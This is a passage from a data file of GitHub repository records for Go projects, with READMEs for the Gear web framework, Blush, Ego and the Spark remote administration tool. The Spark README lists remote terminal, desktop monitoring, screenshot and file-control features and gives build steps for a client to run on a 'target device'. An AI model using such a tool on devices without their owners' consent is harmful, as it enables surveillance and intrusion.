[\u96c6\u4e2d\u3001\u667a\u80fd\u3001\u53ef\u81ea\u5b9a\u4e49\u7684\u9519\u8bef\u548c\u5f02\u5e38\u5904\u7406](https://github.com/teambition/gear/blob/master/doc/design.md#5-\u96c6\u4e2d\u667a\u80fd\u53ef\u81ea\u5b9a\u4e49\u7684\u9519\u8bef\u548c\u5f02\u5e38\u5904\u7406)\n1. [After Hook \u548c End Hook \u7684\u540e\u7f6e\u5904\u7406](https://github.com/teambition/gear/blob/master/doc/design.md#6-after-hook-\u548c-end-hook-\u7684\u540e\u7f6e\u5904\u7406)\n1. [Any interface \u65e0\u9650\u7684 gear.Context \u72b6\u6001\u6269\u5c55\u80fd\u529b](https://github.com/teambition/gear/blob/master/doc/design.md#7-any-interface-\u65e0\u9650\u7684-gearcontext-\u72b6\u6001\u6269\u5c55\u80fd\u529b)\n1. [\u8bf7\u6c42\u6570\u636e\u7684\u89e3\u6790\u548c\u9a8c\u8bc1](https://github.com/teambition/gear/blob/master/doc/design.md#8-\u8bf7\u6c42\u6570\u636e\u7684\u89e3\u6790\u548c\u9a8c\u8bc1)\n\n## FAQ\n\n1. [\u5982\u4f55\u4ece\u6e90\u7801\u81ea\u52a8\u751f\u6210 Swagger v2 \u7684\u6587\u6863\uff1f](https://github.com/teambition/gear/blob/master/doc/faq.md#1-\u5982\u4f55\u4ece\u6e90\u7801\u81ea\u52a8\u751f\u6210-swagger-v2-\u7684\u6587\u6863)\n1. [Go \u8bed\u8a00\u5b8c\u6574\u7684\u5e94\u7528\u9879\u76ee\u7ed3\u6784\u6700\u4f73\u5b9e\u8df5\u662f\u600e\u6837\u7684\uff1f](https://github.com/teambition/gear/blob/master/doc/faq.md#2-go-\u8bed\u8a00\u5b8c\u6574\u7684\u5e94\u7528\u9879\u76ee\u7ed3\u6784\u6700\u4f73\u5b9e\u8df5\u662f\u600e\u6837\u7684)\n\n## Demo\n\n### Hello\n\nhttps://github.com/teambition/gear/tree/master/example/hello\n\n```go\n app := gear.New()\n\n // Add logging middleware\n app.UseHandler(logging.Default(true))\n\n // Add router middleware\n router := gear.NewRouter()\n\n // try: http://127.0.0.1:3000/hello\n router.Get(\"/hello\", func(ctx *gear.Context) error {\n return ctx.HTML(200, \"

<h1>Hello, Gear!</h1>
\")\n })\n\n // try: http://127.0.0.1:3000/test?query=hello\n router.Otherwise(func(ctx *gear.Context) error {\n return ctx.JSON(200, map[string]any{\n \"Host\": ctx.Host,\n \"Method\": ctx.Method,\n \"Path\": ctx.Path,\n \"URI\": ctx.Req.RequestURI,\n \"Headers\": ctx.Req.Header,\n })\n })\n app.UseHandler(router)\n app.Error(app.Listen(\":3000\"))\n```\n\n### HTTP2 with Push\n\nhttps://github.com/teambition/gear/tree/master/example/http2\n\n```go\npackage main\n\nimport (\n \"net/http\"\n\n \"github.com/teambition/gear\"\n \"github.com/teambition/gear/logging\"\n \"github.com/teambition/gear/middleware/favicon\"\n)\n\n// go run example/http2/app.go\n// Visit: https://127.0.0.1:3000/\nfunc main() {\n const htmlBody = `\n\n\n \n \n \n \n

<h1>Hello, Gear!</h1>
\n \n`\n\n const pushBody = `\nh1 {\n color: red;\n}\n`\n\n app := gear.New()\n\n app.UseHandler(logging.Default(true))\n app.Use(favicon.New(\"./testdata/favicon.ico\"))\n\n router := gear.NewRouter()\n router.Get(\"/\", func(ctx *gear.Context) error {\n ctx.Res.Push(\"/hello.css\", &http.PushOptions{Method: \"GET\"})\n return ctx.HTML(200, htmlBody)\n })\n router.Get(\"/hello.css\", func(ctx *gear.Context) error {\n ctx.Type(\"text/css\")\n return ctx.End(200, []byte(pushBody))\n })\n app.UseHandler(router)\n app.Error(app.ListenTLS(\":3000\", \"./testdata/out/test.crt\", \"./testdata/out/test.key\"))\n}\n```\n\n### A CMD tool: static server\n\nhttps://github.com/teambition/gear/tree/master/example/staticgo\n\nInstall it with go:\n\n```sh\ngo install github.com/teambition/gear/example/staticgo\n```\n\nIt is a useful CMD tool that serve your local files as web server (support TLS).\nYou can build `osx`, `linux`, `windows` version with `make build`.\n\n```go\npackage main\n\nimport (\n \"flag\"\n\n \"github.com/teambition/gear\"\n \"github.com/teambition/gear/logging\"\n \"github.com/teambition/gear/middleware/cors\"\n \"github.com/teambition/gear/middleware/static\"\n)\n\nvar (\n address = flag.String(\"addr\", \"127.0.0.1:3000\", `address to listen on.`)\n path = flag.String(\"path\", \"./\", `static files path to serve.`)\n certFile = flag.String(\"certFile\", \"\", `certFile path, used to create TLS static server.`)\n keyFile = flag.String(\"keyFile\", \"\", `keyFile path, used to create TLS static server.`)\n)\n\nfunc main() {\n flag.Parse()\n app := gear.New()\n\n app.UseHandler(logging.Default(true))\n app.Use(cors.New())\n app.Use(static.New(static.Options{Root: *path}))\n\n logging.Println(\"staticgo v1.1.0, created by https://github.com/teambition/gear\")\n logging.Printf(\"listen: %s, serve: %s\\n\", *address, *path)\n\n if *certFile != \"\" && *keyFile != \"\" {\n app.Error(app.ListenTLS(*address, *certFile, *keyFile))\n } else {\n app.Error(app.Listen(*address))\n }\n}\n```\n\n### HTTP2 & gRPC\n\nhttps://github.com/teambition/gear/tree/master/example/grpc_server\n\nhttps://github.com/teambition/gear/tree/master/example/grpc_client\n\n## About Router\n\n[gear.Router](https://godoc.org/github.com/teambition/gear#Router) is a trie base HTTP request handler.\nFeatures:\n\n1. Support named parameter\n1. Support regexp\n1. Support suffix matching\n1. Support multi-router\n1. Support router layer middlewares\n1. Support fixed path automatic redirection\n1. Support trailing slash automatic redirection\n1. Automatic handle `405 Method Not Allowed`\n1. Automatic handle `OPTIONS` method\n1. Best Performance\n\nThe registered path, against which the router matches incoming requests, can contain six types of parameters:\n\n| Syntax | Description |\n|--------|------|\n| `:name` | named parameter |\n| `:name(regexp)` | named with regexp parameter |\n| `:name+suffix` | named parameter with suffix matching |\n| `:name(regexp)+suffix` | named with regexp parameter and suffix matching |\n| `:name*` | named with catch-all parameter |\n| `::name` | not named parameter, it is literal `:name` |\n\nNamed parameters are dynamic path segments. 
They match anything until the next '/' or the path end:\n\nDefined: `/api/:type/:ID`\n\n```md\n/api/user/123 matched: type=\"user\", ID=\"123\"\n/api/user no match\n/api/user/123/comments no match\n```\n\nNamed with regexp parameters match anything using regexp until the next '/' or the path end:\n\nDefined: `/api/:type/:ID(^\\d+$)`\n\n```md\n/api/user/123 matched: type=\"user\", ID=\"123\"\n/api/user no match\n/api/user/abc no match\n/api/user/123/comments no match\n```\n\nNamed parameters with suffix, such as [Google API Design](https://cloud.google.com/apis/design/custom_methods):\n\nDefined: `/api/:resource/:ID+:undelete`\n\n```md\n/api/file/123 no match\n/api/file/123:undelete matched: resource=\"file\", ID=\"123\"\n/api/file/123:undelete/comments no match\n```\n\nNamed with regexp parameters and suffix:\n\nDefined: `/api/:resource/:ID(^\\d+$)+:cancel`\n\n```md\n/api/task/123 no match\n/api/task/123:cancel matched: resource=\"task\", ID=\"123\"\n/api/task/abc:cancel no match\n```\n\nNamed with catch-all parameters match anything until the path end, including the directory index (the '/' before the catch-all). Since they match anything until the end, catch-all parameters must always be the final path element.\n\nDefined: `/files/:filepath*`\n\n```\n/files no match\n/files/LICENSE matched: filepath=\"LICENSE\"\n/files/templates/article.html matched: filepath=\"templates/article.html\"\n```\n\nThe value of parameters is saved on the `Matched.Params`. Retrieve the value of a parameter by name:\n\n```go\ntype := matched.Params(\"type\")\nid := matched.Params(\"ID\")\n```\n\n## More Middlewares\n\n- Structured logging: [github.com/teambition/gear/logging](https://github.com/teambition/gear/tree/master/logging)\n- CORS handler: [github.com/teambition/gear/middleware/cors](https://github.com/teambition/gear/tree/master/middleware/cors)\n- Secure handler: [github.com/teambition/gear/middleware/secure](https://github.com/teambition/gear/tree/master/middleware/secure)\n- Static serving: [github.com/teambition/gear/middleware/static](https://github.com/teambition/gear/tree/master/middleware/static)\n- Favicon serving: [github.com/teambition/gear/middleware/favicon](https://github.com/teambition/gear/tree/master/middleware/favicon)\n- gRPC serving: [github.com/teambition/gear/middleware/grpc](https://github.com/teambition/gear/tree/master/middleware/grpc)\n- JWT and Crypto auth: [Gear-Auth](https://github.com/teambition/gear-auth)\n- Cookie session: [Gear-Session](https://github.com/teambition/gear-session)\n- Session middleware: [https://github.com/go-session/gear-session](https://github.com/go-session/gear-session)\n- Smart rate limiter: [Gear-Ratelimiter](https://github.com/teambition/gear-ratelimiter)\n- CSRF: [Gear-CSRF](https://github.com/teambition/gear-csrf)\n- Opentracing with Zipkin: [Gear-Tracing](https://github.com/teambition/gear-tracing)\n\n## License\n\nGear is licensed under the [MIT](https://github.com/teambition/gear/blob/master/LICENSE) license.\nCopyright © 2016-2023 [Teambition](https://www.teambition.com).\n", "readme_type": "markdown", "hn_comments": "Features- Effective and flexible middlewares flow control, create anything by middleware- Powerful and smart error handler, make development easy- Trie base gear.Router, it is as faster as [HttpRouter](https://github.com/julienschmidt/httprouter), but more powerful- Integrated timeout context.Context- Integrated response content compress- Integrated structured logging middleware- Integrated request body parser- Integrated 
signed cookies- Integrated JSON, JSONP, XML and HTML renderer- Integrated CORS, Secure, Favicon and Static middlewares- More useful methods on gear.Context to manipulate HTTP Request/Response- Completely HTTP/2.0 supported", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "XZB-1248/Spark", "link": "https://github.com/XZB-1248/Spark", "tags": ["golang", "rat", "remote-control", "remote-administration-tool", "remote-admin-tool", "spark", "server-monitoring", "dashboard", "go", "remote-access-tool", "shell", "webshell"], "stars": 547, "description": "\u2728Spark is a web-based, cross-platform and full-featured Remote Administration Tool (RAT) written in Go that allows you control all your devices anywhere. Spark\u662f\u4e00\u4e2aGo\u7f16\u5199\u7684\uff0c\u7f51\u9875UI\u3001\u8de8\u5e73\u53f0\u4ee5\u53ca\u591a\u529f\u80fd\u7684\u8fdc\u7a0b\u63a7\u5236\u548c\u76d1\u63a7\u5de5\u5177\uff0c\u4f60\u53ef\u4ee5\u968f\u65f6\u968f\u5730\u76d1\u63a7\u548c\u63a7\u5236\u6240\u6709\u8bbe\u5907\u3002", "lang": "Go", "repo_lang": "", "readme": "#### [English] [[\u4e2d\u6587]](./README.ZH.md) [[API Document]](./API.md) [[API\u6587\u6863]](./API.ZH.md)\n\n---\n\n
Spark
\n\n**Spark** is a free, safe, open-source, web-based, cross-platform and full-featured RAT (Remote Administration Tool)\nthat allows you to control all your devices from a browser, anywhere.\n\nWe **won't** collect any data, and the server will never self-upgrade. Your clients will only ever communicate with your\nserver.\n\n---\n\n
\n\n|![GitHub repo size](https://img.shields.io/github/repo-size/DGP-Studio/Snap.Genshin?style=flat-square)|![GitHub issues](https://img.shields.io/github/issues/XZB-1248/Spark?style=flat-square)|![GitHub closed issues](https://img.shields.io/github/issues-closed/XZB-1248/Spark?style=flat-square)|\n|-|-|-|\n\n|[![GitHub downloads](https://img.shields.io/github/downloads/XZB-1248/Spark/total?style=flat-square)](https://github.com/XZB-1248/Spark/releases)|[![GitHub release (latest by date)](https://img.shields.io/github/downloads/XZB-1248/Spark/latest/total?style=flat-square)](https://github.com/XZB-1248/Spark/releases/latest)|\n|-|-|\n\n
\n\n---\n\n## Disclaimer\n\n**THIS PROJECT, ITS SOURCE CODE, AND ITS RELEASES SHOULD ONLY BE USED FOR EDUCATIONAL PURPOSES.**\n
\n**ALL ILLEGAL USAGE IS PROHIBITED!**\n
\n**YOU SHALL USE THIS PROJECT AT YOUR OWN RISK.**\n
\n**THE AUTHORS AND DEVELOPERS ARE NOT RESPONSIBLE FOR ANY DAMAGE CAUSED BY YOUR MISUSE OF THIS PROJECT.**\n\n**YOUR DATA IS PRICELESS. THINK TWICE BEFORE YOU CLICK ANY BUTTON OR ENTER ANY COMMAND.**\n\n---\n\n## Quick start\n\n### binary\n\n* Download the executable from [releases](https://github.com/XZB-1248/Spark/releases).\n* Follow [this](#Configuration) to complete the configuration.\n* Run the executable and browse to `http://IP:Port` to access the web interface.\n* Generate a client and run it on your target device.\n* Enjoy!\n\n---\n\n## Configuration\n\nThe configuration file `config.json` should be placed in the same directory as the executable file.\n
\nExample:\n\n ```json\n {\n \"listen\": \":8000\",\n \"salt\": \"123456abcdefg\",\n \"auth\": {\n \"username\": \"password\"\n },\n \"log\": {\n \"level\": \"info\",\n \"path\": \"./logs\",\n \"days\": 7\n }\n }\n ```\n\n* `listen` `required`, format: `IP:Port`\n* `salt` `required`, length <= 24\n * after modification, you need to re-generate all clients\n* `auth` `optional`, format: `username:password`\n * hashed-password is highly recommended\n * format: `$algorithm$hashed-password`, example: `$sha256$123456abcdefg`\n * supported algorithms: `sha256`, `sha512`, `bcrypt`\n * if you don't follow the format, password will be treated as plain-text\n* `log` `optional`\n * `level` `optional`, possible value: `disable`, `fatal`, `error`, `warn`, `info`, `debug`\n * `path` `optional`, default: `./logs`\n * `days` `optional`, default: `7`\n\n---\n\n## Features\n\n| Feature/OS | Windows | Linux | MacOS |\n|-----------------|---------|-------|-------|\n| Process manager | \u2714 | \u2714 | \u2714 |\n| Kill process | \u2714 | \u2714 | \u2714 |\n| Network traffic | \u2714 | \u2714 | \u2714 |\n| File explorer | \u2714 | \u2714 | \u2714 |\n| File transfer | \u2714 | \u2714 | \u2714 |\n| File editor | \u2714 | \u2714 | \u2714 |\n| Delete file | \u2714 | \u2714 | \u2714 |\n| Code highlight | \u2714 | \u2714 | \u2714 |\n| Desktop monitor | \u2714 | \u2714 | \u2714 |\n| Screenshot | \u2714 | \u2714 | \u2714 |\n| OS info | \u2714 | \u2714 | \u2714 |\n| Terminal | \u2714 | \u2714 | \u2714 |\n| * Shutdown | \u2714 | \u2714 | \u2714 |\n| * Reboot | \u2714 | \u2714 | \u2714 |\n| * Log off | \u2714 | \u274c | \u2714 |\n| * Sleep | \u2714 | \u274c | \u2714 |\n| * Hibernate | \u2714 | \u274c | \u274c |\n| * Lock screen | \u2714 | \u274c | \u274c |\n\n* Blank cell means the situation is not tested yet.\n* The Star symbol means the function may need administration or root privilege.\n\n---\n\n## Screenshots\n\n![overview](./screenshots/overview.png)\n\n![terminal](./screenshots/terminal.png)\n\n![desktop](./screenshots/desktop.png)\n\n![procmgr](./screenshots/procmgr.png)\n\n![explorer](./screenshots/explorer.png)\n\n![overview.cpu](./screenshots/overview.cpu.png)\n\n![explorer.editor](./screenshots/explorer.editor.png)\n\n---\n\n## Development\n\n### note\n\nThere are three components in this project, so you have to build them all.\n\nGo to [Quick start](#quick-start) if you don't want to make yourself boring.\n\n* Client\n* Server\n* Front-end\n\nIf you want to make client support OS except linux and windows, you should install some additional C compiler.\n\nFor example, to support android, you have to install [Android NDK](https://developer.android.com/ndk/downloads).\n\n### tutorial\n\n```bash\n# Clone this repository.\n$ git clone https://github.com/XZB-1248/Spark\n$ cd ./Spark\n\n\n# Here we're going to build front-end pages.\n$ cd ./web\n# Install all dependencies and build.\n$ npm install\n$ npm run build-prod\n\n\n# Embed all static resources into one single file by using statik.\n$ cd ..\n$ go install github.com/rakyll/statik\n$ statik -m -src=\"./web/dist\" -f -dest=\"./server/embed\" -p web -ns web\n\n\n# Now we should build client.\n# When you're using unix-like OS, you can use this.\n$ mkdir ./built\n$ go mod tidy\n$ go mod download\n$ ./scripts/build.client.sh\n\n\n# Finally we're compiling the server side.\n$ mkdir ./releases\n$ ./scripts/build.server.sh\n```\n\nThen create a new directory with a name you like.\n
\nCopy the executable file inside `releases` to that directory.\n
\nCopy the whole `built` directory to that new directory.\n
\nCopy the configuration file mentioned above to that new directory.\n
\nFinally, run the executable file in that directory.\n\n---\n\n## Dependencies\n\nSpark contains many third-party open-source projects.\n\nLists of dependencies can be found at `go.mod` and `package.json`.\n\nSome major dependencies are listed below.\n\n### Back-end\n\n* [Go](https://github.com/golang/go) ([License](https://github.com/golang/go/blob/master/LICENSE))\n\n* [gin-gonic/gin](https://github.com/gin-gonic/gin) (MIT License)\n\n* [imroc/req](https://github.com/imroc/req) (MIT License)\n\n* [kbinani/screenshot](https://github.com/kbinani/screenshot) (MIT License)\n\n* [shirou/gopsutil](https://github.com/shirou/gopsutil) ([License](https://github.com/shirou/gopsutil/blob/master/LICENSE))\n\n* [gorilla/websocket](https://github.com/gorilla/websocket) (BSD-2-Clause License)\n\n* [orcaman/concurrent-map](https://github.com/orcaman/concurrent-map) (MIT License)\n\n### Front-end\n\n* [React](https://github.com/facebook/react) (MIT License)\n\n* [Ant-Design](https://github.com/ant-design/ant-design) (MIT License)\n\n* [axios](https://github.com/axios/axios) (MIT License)\n\n* [xterm.js](https://github.com/xtermjs/xterm.js) (MIT License)\n\n* [crypto-js](https://github.com/brix/crypto-js) (MIT License)\n\n### Acknowledgements\n\n* [natpass](https://github.com/lwch/natpass) (MIT License)\n* Image difference algorithm inspired by natpass.\n\n---\n\n### Stargazers over time\n\n[![Stargazers over time](https://starchart.cc/XZB-1248/Spark.svg)](https://starchart.cc/XZB-1248/Spark)\n\n---\n\n## License\n\n[BSD-2 License](./LICENSE)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "arsham/blush", "link": "https://github.com/arsham/blush", "tags": ["grep", "terminal-app", "golang", "go"], "stars": 546, "description": "Grep with colours", "lang": "Go", "repo_lang": "", "readme": "# Blush\n\n[![PkgGoDev](https://pkg.go.dev/badge/github.com/arsham/dbtools)](https://pkg.go.dev/github.com/arsham/dbtools)\n![GitHub go.mod Go version](https://img.shields.io/github/go-mod/go-version/arsham/dbtools)\n[![Build Status](https://github.com/arsham/dbtools/actions/workflows/go.yml/badge.svg)](https://github.com/arsham/dbtools/actions/workflows/go.yml)\n[![License: MIT](https://img.shields.io/badge/License-MIT-blue.svg)](https://opensource.org/licenses/MIT)\n[![Coverage Status](https://codecov.io/gh/arsham/blush/branch/master/graph/badge.svg)](https://codecov.io/gh/arsham/blush)\n[![Go Report Card](https://goreportcard.com/badge/github.com/arsham/blush)](https://goreportcard.com/report/github.com/arsham/blush)\n\nWith Blush, you can highlight matches with any colours of your choice.\n\n![1](https://user-images.githubusercontent.com/428611/164768864-e9713ac3-0097-4435-8bcb-577dbf7b9931.png)\n\n1. [Install](#install)\n2. [Usage](#usage)\n - [Note](#note)\n - [Normal Mode](#normal-mode)\n - [Dropping Unmatched](#dropping-unmatched)\n - [Piping](#piping)\n3. [Arguments](#arguments)\n - [Notes](#notes)\n4. [Colour Groups](#colour-groups)\n5. [Colours](#colours)\n6. [Complex Grep](#complex-grep)\n7. [Suggestions](#suggestions)\n8. [License](#license)\n\n## Install\n\nYou can grab a binary from [releases](https://github.com/arsham/blush/releases)\npage. 
If you prefer to install it manually you can get the code and install it\nwith the following command:\n\n```bash\n$ go install github.com/arsham/blush@latest\n```\n\nMake sure you have `go>=1.18` installed.\n\n## Usage\n\nBlush can read from a file or a pipe:\n\n```bash\n$ cat FILENAME | blush -b \"print in blue\" -g \"in green\" -g \"another green\"\n$ cat FILENAME | blush \"some text\"\n$ blush -b \"print in blue\" -g \"in green\" -g \"another green\" FILENAME\n$ blush \"some text\" FILENAME\n```\n\n### Note\n\nAlthough this program has a good performance, but performance is not the main\nconcern. There are other tools you should use if you are searching in large\nfiles. Two examples:\n\n- [Ripgrep](https://github.com/BurntSushi/ripgrep)\n- [The Silver Searcher](https://github.com/ggreer/the_silver_searcher)\n\n### Normal Mode\n\nThis method shows matches with the given input:\n\n```bash\n$ blush -b \"first search\" -g \"second one\" -g \"and another one\" files/paths\n```\n\nAny occurrence of `first search` will be in blue, `second one` and `and another one`\nare in green.\n\n![2](https://user-images.githubusercontent.com/428611/164768874-bf687313-c103-449b-bb57-6fdcea51fc5d.png)\n\n### Dropping Unmatched\n\nBy default, unmatched lines are not dropped. But you can use the `-d` flag to\ndrop them:\n\n![3](https://user-images.githubusercontent.com/428611/164768875-c9aa3e47-7db0-454f-8a55-1e2bff332c69.png)\n\n## Arguments\n\n| Argument | Shortcut | Notes |\n| :------------ | :------- | :---------------------------------------------- |\n| N/A | -i | Case insensitive matching. |\n| N/A | -R | Recursive matching. |\n| --no-filename | -h | Suppress the prefixing of file names on output. |\n| --drop | -d | Drop unmatched lines |\n\nFile names or paths are matched from the end. Any argument that doesn't match\nany files or paths are considered as regular expression. If regular expressions\nare not followed by colouring arguments are coloured based on previously\nprovided colour:\n\n```bash\n$ blush -b match1 match2 FILENAME\n```\n\n![4](https://user-images.githubusercontent.com/428611/164768879-f9b73b2c-b6bb-4cf5-a98a-e51535fa554a.png)\n\n### Notes\n\n- If no colour is provided, blush will choose blue.\n- If you only provide file/path, it will print them out without colouring.\n- If the matcher contains only alphabets and numbers, a non-regular expression is applied to search.\n\n## Colour Groups\n\nYou can provide a number for a colour argument to create a colour group:\n\n```bash\n$ blush -r1 match1 -r2 match2 -r1 match3 FILENAME\n```\n\n![5](https://user-images.githubusercontent.com/428611/164768882-5ce57477-e9d5-4170-ac10-731e9391cbee.png)\n\nAll matches will be shown as blue. But `match1` and `match3` will have a\ndifferent background colour than `match2`. This means the numbers will create\ncolour groups.\n\nYou also can provide a colour with a series of match requests:\n\n```bash\n$ blush -r match1 match3 -g match2 FILENAME\n```\n\n## Colours\n\nYou can choose a pre-defined colour, or pass it your own colour with a hash:\n\n| Argument | Shortcut |\n| :-------- | :------- |\n| --red | -r |\n| --green | -g |\n| --blue | -b |\n| --white | -w |\n| --black | -bl |\n| --yellow | -yl |\n| --magenta | -mg |\n| --cyan | -cy |\n\nYou can also pass an RGB colour. 
It can be in short form (--#1b2, -#1b2), or\nlong format (--#11bb22, -#11bb22).\n\n![6](https://user-images.githubusercontent.com/428611/164768883-154b4fd9-946f-43eb-b3f5-ede6027c3eda.png)\n\n## Complex Grep\n\nYou must put your complex grep into quotations:\n\n```bash\n$ blush -b \"^age: [0-9]+\" FILENAME\n```\n\n![7](https://user-images.githubusercontent.com/428611/164768886-5b94b8fa-77e2-4617-80f2-040edce18660.png)\n\n## Suggestions\n\nThis tool is made to make your experience in terminal a more pleasant. Please\nfeel free to make any suggestions or request features by creating an issue.\n\n## License\n\nUse of this source code is governed by the MIT License. License file can be\nfound in the [LICENSE](./LICENSE) file.\n", "readme_type": "markdown", "hn_comments": "I like it. I started something similar with node (I never aimed for performance) trying to go for high grep compatibility but with added extra colors and js regexp flavour.Nice job! Language-specific coloring is really nice!I'll give it a try. I normally use a different Golang tool called sift as my grep replacement (which I love so far): https://github.com/svent/siftSift's goals seem to be mostly performance (it is super fast), but it would be nice to have some of these more sophisticated coloring features in there as well, as they are useful.Is this speed competitive with tools like the silver searcher (`ag`) or is the focus here on color?Useless use of cat candidate.Do be sure to at least consider supporting no colour! http://no-color.orgGNU grep has support for colors.But... Can it elegantly suppress broken pipe errors?https://www.blockchainhelp.proNice UI!\nSome time ago I wrote something similar, because I was missing some features in ripgrep (which is otherwise pretty awesome): https://github.com/dominikschulz/ggReally cool! But from the title I initially thought this was a grep tool for finding certain colors in your image data.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "benbjohnson/ego", "link": "https://github.com/benbjohnson/ego", "tags": ["go", "template-language", "erb"], "stars": 546, "description": "An ERB-style templating language for Go.", "lang": "Go", "repo_lang": "", "readme": "Ego [![GoDoc](https://img.shields.io/badge/godoc-reference-5272B4.svg?style=flat-square)](https://godoc.org/github.com/benbjohnson/ego)\n===\n\nEgo is an [ERb](http://ruby-doc.org/stdlib-2.1.0/libdoc/erb/rdoc/ERB.html) style templating language for Go. It works by transpiling templates into pure Go and including them at compile time. These templates are light wrappers around the Go language itself.\n\n## Install\n\nYou can find a release build of ego for Linux on the [Releases page](https://github.com/benbjohnson/ego/releases).\n\nTo install ego from source, you can run this command outside of the `GOPATH`:\n\n```sh\n$ go get github.com/benbjohnson/ego/...\n```\n\n\n## Usage\n\nRun `ego` on a directory. 
Recursively traverse the directory structure and generate Go files for all matching `.ego` files.\n\n```sh\n$ ego mypkg\n```\n\n\n## How to Write Templates\n\nAn ego template lets you write text that you want to print out but gives you some handy tags to let you inject actual Go code.\nThis means you don't need to learn a new scripting language to write ego templates\u2014you already know Go!\n\n### Raw Text\n\nAny text the `ego` tool encounters that is not wrapped in `<%` and `%>` tags is considered raw text.\nIf you have a template like this:\n\n```\nhello!\ngoodbye!\n```\n\nThen `ego` will generate a matching `.ego.go` file:\n\n```\nio.WriteString(w, \"hello!\\ngoodbye!\")\n```\n\nUnfortunately that file won't run because we're missing a `package` line at the top.\nWe can fix that with _code blocks_.\n\n\n### Code Blocks\n\nA code block is a section of your template wrapped in `<%` and `%>` tags.\nIt is raw Go code that will be inserted into our generate `.ego.go` file as-is.\n\nFor example, given this template:\n\n```\n<%\npackage myapp\n\nfunc Render(ctx context.Context, w io.Writer) {\n%>\nhello!\ngoodbye!\n<% } %>\n```\n\nThe `ego` tool will generate:\n\n```\npackage myapp\n\nimport (\n\t\"context\"\n\t\"io\"\n)\n\nfunc Render(ctx context.Context, w io.Writer) {\n\tio.WriteString(w, \"hello!\\ngoodbye!\")\n}\n```\n\n_Note the `context` and `io` packages are automatically imported to your template._\n_These are the only packages that do this._\n_You'll need to import any other packages you use._\n\n\n### Print Blocks\n\nOur template is getting more useful.\nWe now have actually runnable Go code.\nHowever, our templates typically need output text frequently so there are blocks specifically for this task called _print blocks_.\nThese print blocks wrap a Go expression with `<%=` and `%>` tags.\n\nWe can expand our previous example and add a type and fields to our code:\n\n\n```\n<%\npackage myapp\n\ntype NameRenderer struct {\n\tName string\n\tGreet bool\n}\n\nfunc (r *NameRenderer) Render(ctx context.Context, w io.Writer) {\n%>\n\t<% if r.Greet { %>\n\t\thello, <%= r.Name %>!\n\t<% } else { %>\n\t\tgoodbye, <%= r.Name %>!\n\t<% } %>\n<% } %>\n```\n\nWe now have a conditional around our `Greet` field and we are printing the `Name` field.\nOur generated code will look like:\n\n\n```\npackage myapp\n\nimport (\n\t\"context\"\n\t\"io\"\n)\n\ntype NameRenderer struct {\n\tName string\n\tGreet bool\n}\n\nfunc Render(ctx context.Context, w io.Writer) {\n\tif r.Greet {\n\t\tio.WriteString(w, \"hello, \")\n\t\tio.WriteString(w, html.EscapeString(fmt.Sprint(r.Name)))\n\t\tio.WriteString(w, \"!\")\n\t} else {\n\t\tio.WriteString(w, \"goodbye, \")\n\t\tio.WriteString(w, html.EscapeString(fmt.Sprint(r.Name)))\n\t\tio.WriteString(w, \"!\")\n\t}\n}\n```\n\n\n#### Printing unescaped HTML\n\nThe `<%= %>` block will print your text as escaped HTML, however, sometimes you need the raw text such as when you're writing JSON.\nTo do this, simply wrap your Go expression with `<%==` and `%>` tags.\n\n\n### Components\n\nSimple code and print tags work well for simple templates but it can be difficult to make reusable functionality.\nYou can use the component syntax to print types that implement this `Renderer` interface:\n\n```\ntype Renderer interface {\n\tRender(context.Context, io.Writer)\n}\n```\n\nComponent syntax look likes HTML.\nYou specify the type you want to instantiate as the node name and then use attributes to assign values to fields.\nThe body of your component will be assigned as a closure to 
a field called `Yield` on your component type.\n\nFor example, let's say you want to make a reusable button that outputs [Bootstrap 4.0](http://getbootstrap.com/) code:\nWe can write this component as an ego template or in pure Go code.\nHere we'll write the component in Go:\n\n```\npackage myapp\n\nimport (\n\t\"context\"\n\t\"io\"\n)\n\ntype Button struct {\n\tStyle string\n\tYield func()\n}\n\nfunc (r *Button) Render(ctx context.Context, w io.Writer) {\n\tfmt.Fprintf(w, `
`, r.Style)\n\tif r.Yield != nil {\n\t\tr.Yield()\n\t}\n\tfmt.Fprintf(w, `
`)\n}\n```\n\nNow we can use that component from a template in the same package like this:\n\n```\n<%\npackage myapp\n\ntype MyTemplate struct {}\n\nfunc (r *MyTemplate) Render(ctx context.Context, w io.Writer) {\n%>\n\t
\n\t\tDon't click me!\n\t
\n<% } %>\n```\n\nOur template automatically convert our component syntax into an instance and invocation of `Button`:\n\n```\nvar EGO Button\nEGO.Style = \"danger\"\nEGO.Yield = func() { io.WriteString(w, \"Don't click me!\") }\nEGO.Render(ctx, w)\n```\n\nField values can be specified as any Go expression.\nFor example, you could specify a function to return a value for `Button.Style`:\n\n```\nDon't click me!\n```\n\n#### Named closures\n\nThe `Yield` is a special instance of a closure, however, you can also specify named closures using the `::` syntax.\n\nGiven a component type:\n\n```\ntype MyView struct {\n\tHeader func()\n\tYield func()\n}\n```\n\nWe can specify the separate closures like this:\n\n```\n\n\t\n\t\tThis content will go in the Header closure.\n\t\n\n\tThis content will go in the Yield closure.\n\n```\n\n#### Importing components from other packages\n\nYou can import components from other packages by using a namespace that matches the package name\nThe `ego` namespace is reserved to import types in the current package.\n\nFor example, you can import components from a library such as [bootstrap-ego](https://github.com/benbjohnson/bootstrap-ego):\n\n```\n<%\npackage myapp\n\nimport \"github.com/benbjohnson/bootstrap-ego\"\n\ntype MyTemplate struct {}\n\nfunc (r *MyTemplate) Render(ctx context.Context, w io.Writer) {\n%>\n\t\n\t\t\n\t\t\t
\n\t\t\t\tDon't click me!\n
\n<% } %>\n```\n\n\n## Caveats\n\nUnlike other runtime-based templating languages, ego does not support ad hoc templates. All templates must be generated before compile time.\n\nEgo does not attempt to provide any security around the templates. Just like regular Go code, the security model is up to you.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "argoproj-labs/argocd-autopilot", "link": "https://github.com/argoproj-labs/argocd-autopilot", "tags": [], "stars": 546, "description": "Argo-CD Autopilot", "lang": "Go", "repo_lang": "", "readme": "
Argo CD Autopilot logo
